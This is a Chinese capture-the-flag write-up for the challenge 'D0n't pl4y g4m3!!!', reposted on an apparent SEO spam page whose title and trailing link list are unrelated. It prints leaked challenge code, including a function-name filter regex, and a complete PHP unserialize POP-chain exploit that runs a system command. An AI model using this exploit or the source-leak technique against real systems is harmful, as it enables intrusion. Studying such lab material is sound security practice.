当前位置: 首页 > news >正文

哈尔滨建站模板源码佛山seo联系方式

哈尔滨建站模板源码,佛山seo联系方式,杭州做网站公司有哪些,深圳网站优化文章目录 D0nt pl4y g4m3!!! D0n’t pl4y g4m3!!! 打开题目&#xff0c;可以判断这里为php Development Server 启动的服务 查询得知&#xff0c;存在 PHP<7.4.21 Development Server源码泄露漏洞(参考文章) 抓包&#xff0c;构造payload 得到源码 class Pro{private $ex…

文章目录

    • D0n't pl4y g4m3!!!


D0n’t pl4y g4m3!!!

打开题目,可以判断这里为php Development Server 启动的服务

在这里插入图片描述查询得知,存在 PHP<=7.4.21 Development Server源码泄露漏洞(参考文章)
抓包,构造payload
在这里插入图片描述得到源码

class Pro{private $exp;private $rce2;public function __get($name){return $this->$rce2=$this->exp[$rce2];}public  function __toString(){call_user_func('system', "cat /flag");}
}class Yang
{public function __call($name, $ary){if ($this->key === true || $this->finish1->name) {if ($this->finish->finish) {call_user_func($this->now[$name], $ary[0]);}}}public function ycb(){$this->now = 0;return $this->finish->finish;}public function __wakeup(){$this->key = True;}
}
class Cheng
{private $finish;public $name;public function __get($value){return $this->$value = $this->name[$value];}
}
class Bei
{public function __destruct(){if ($this->CTF->ycb()) {$this->fine->YCB1($this->rce, $this->rce1);}}public function __wakeup(){$this->key = false;}
}function prohib($a){$filter = "/system|exec|passthru|shell_exec|popen|proc_open|pcntl_exec|eval|flag/i";return preg_replace($filter,'',$a);
}$a = $_POST["CTF"];
if (isset($a)){unserialize(prohib($a));
}
?>

还有提示./hint.zip,下载完解压,猜测是某种编码
复制到谷歌,发现GitHub上面有解码工具
在这里插入图片描述然后再回过头看
pop链子:Bei.__destruct()->Yang.__call()
exp

<?php
class Pro  //five
{private $exp;private $rce2;
}class Yang  //one
{public function __call($name, $ary){if ($this->key === true || $this->finish1->name) {if ($this->finish->finish) {call_user_func($this->now[$name], $ary[0]);}}}public function ycb(){$this->now = 0;return $this->finish->finish;}
}
class Cheng  //two
{private $finish;public $name;}
class Bei  //four
{public function __destruct(){if ($this->CTF->ycb()) {$this->fine->YCB1($this->rce, $this->rce1);}}public function __wakeup(){$this->key = false;}
}$a=new Bei();
$a->rce="cat /tmp/catcatf1ag.txt";
$a->rce1="";
$b=new Yang();
$b->finish->finish=true;
$a->CTF=$b;
$c=new Yang();
$c->key=true;
$c->finish->finish=true;
$c->now['YCB1']='system';
$a->fine=$c;
echo urlencode(serialize($a));
?>

得到flag在这里插入图片描述

http://www.ho-use.cn/article/2509.html

相关文章:

  • access做网站给你一个网站怎么优化
  • 做私活有哪些网站做网站的好处
  • 怎么做自已的网站seo网站整站优化
  • 网站功能设计的内容竞价sem托管
  • 深度网络北京网站优化技术
  • 做解密类网站可行网络营销的定义
  • 企业网站源码 php游戏推广员判几年
  • 搜搜网站提交入口抖音关键词排名查询工具
  • 小学生编程软件如何做好网站站内优化
  • wordpress图片上传seo监控系统
  • wordpress多个页面主题做百度seo
  • 地方网站怎么做挣钱东莞网络推广营销
  • 杭州手机网站制作电脑公司百度一下app下载安装
  • html 购物网站西安网站开发
  • 网站前端做报名框代码江门关键词排名优化
  • 晨光科技 网站建设郑州百度网站优化排名
  • 南京有关制作网站的公司seo的工具有哪些
  • 自己怎么手机做网站手机自己怎么建电影网站
  • 怎么看公司网站是哪里做的合肥关键词快速排名
  • 做简图的网站手机如何制作一个网页链接
  • 产品商城网站建设宁波网站建设与维护
  • canvas设计网站win10优化大师官网
  • 石家庄做网站制作公司100个关键词
  • 网站上面做测试题微信管理软件
  • 简单html网站页面优化算法
  • 上传产品网站怎么做seo公司是什么意思
  • 晋江网站建设报价网站seo的方法
  • 网上商城什么意思网络优化工程师主要做什么
  • vs2008怎么做网站做百度推广代运营有用吗
  • 网站中点击链接怎么做的北京网站优化步